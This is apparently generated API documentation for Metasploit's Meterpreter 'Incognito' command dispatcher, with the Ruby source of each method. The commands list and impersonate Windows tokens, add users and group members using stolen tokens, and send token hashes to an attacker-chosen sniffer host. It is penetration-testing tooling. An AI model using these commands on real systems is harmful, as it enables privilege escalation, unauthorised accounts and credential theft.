class Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Incognito
Privilege escalation extension user interface.
Constants
- Klass
Public Class Methods
new(shell)
click to toggle source
Initializes an instance of the priv command interaction.
Calls superclass method
Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::new
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 22 def initialize(shell) super end
Public Instance Methods
cmd_add_group_user(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 176 def cmd_add_group_user(*args) # Default to localhost host = "127.0.0.1" @@add_group_user_opts.parse(args) { |opt, idx, val| case opt when "-h" host = val end } if (args.length < 2) print_line("Usage: add_group_user <groupname> <username> [options]\n") print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted") print_line(@@add_group_user_opts.usage) return end system_privilege_check groupname = args[0] username = args[1] client.incognito.incognito_add_group_user(host, groupname, username).each_line { |string| print(string) } return true end
cmd_add_localgroup_user(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 146 def cmd_add_localgroup_user(*args) # Default to localhost host = "127.0.0.1" @@add_localgroup_user_opts.parse(args) { |opt, idx, val| case opt when "-h" host = val end } if (args.length < 2) print_line("Usage: add_localgroup_user <groupname> <username> [options]\n") print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted") print_line(@@add_localgroup_user_opts.usage) return end system_privilege_check groupname = args[0] username = args[1] client.incognito.incognito_add_localgroup_user(host, groupname, username).each_line { |string| print(string) } return true end
cmd_add_user(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 116 def cmd_add_user(*args) # Default to localhost host = "127.0.0.1" @@add_user_opts.parse(args) { |opt, idx, val| case opt when "-h" host = val end } if (args.length < 2) print_line("Usage: add_user <username> <password> [options]\n") print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted") print_line(@@add_user_opts.usage) return end system_privilege_check username = args[0] password = args[1] client.incognito.incognito_add_user(host, username, password).each_line { |string| print(string) } return true end
cmd_impersonate_token(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 98 def cmd_impersonate_token(*args) if (args.length < 1) print_line("Usage: impersonate_token <token>\n") print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n") print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)") print_line("Hint: Enclose with quotation marks if name contains a space\n") return end system_privilege_check username = args[0] client.incognito.incognito_impersonate_token(username).each_line { |string| print(string) } return true end
cmd_list_tokens(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 54 def cmd_list_tokens(*args) token_order = -1 @@list_tokens_opts.parse(args) { |opt, idx, val| case opt when "-u" token_order = 0 when "-g" token_order = 1 end } if (token_order == -1) print_line("Usage: list_tokens <list_order_option>\n") print_line("Lists all accessible tokens and their privilege level") print_line(@@list_tokens_opts.usage) return end system_privilege_check tokens = client.incognito.incognito_list_tokens(token_order) print_line() print_line("Delegation Tokens Available") print_line("========================================") tokens['delegation'].each_line { |string| print(string) } print_line() print_line("Impersonation Tokens Available") print_line("========================================") tokens['impersonation'].each_line { |string| print(string) } print_line() return true end
cmd_snarf_hashes(*args)
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 206 def cmd_snarf_hashes(*args) if (args.length < 1) print_line("Usage: snarf_hashes <sniffer_host>\n") print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n") return end system_privilege_check print_line("[*] Snarfing token hashes...") client.incognito.incognito_snarf_hashes(args[0]) print_line("[*] Done. Check sniffer logs") return true end
commands()
click to toggle source
List of supported commands.
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 29 def commands { "add_user" => "Attempt to add a user with all tokens", "add_localgroup_user" => "Attempt to add a user to a local group with all tokens", "add_group_user" => "Attempt to add a user to a global group with all tokens", "list_tokens" => "List tokens available under current user context", "impersonate_token" => "Impersonate specified token", "snarf_hashes" => "Snarf challenge/response hashes for every token" } end
name()
click to toggle source
Name for this dispatcher
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 232 def name "Incognito" end
system_privilege_check()
click to toggle source
# File lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb, line 222 def system_privilege_check unless client.sys.config.is_system? print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available") print_line(" Call rev2self if primary process token is SYSTEM") end end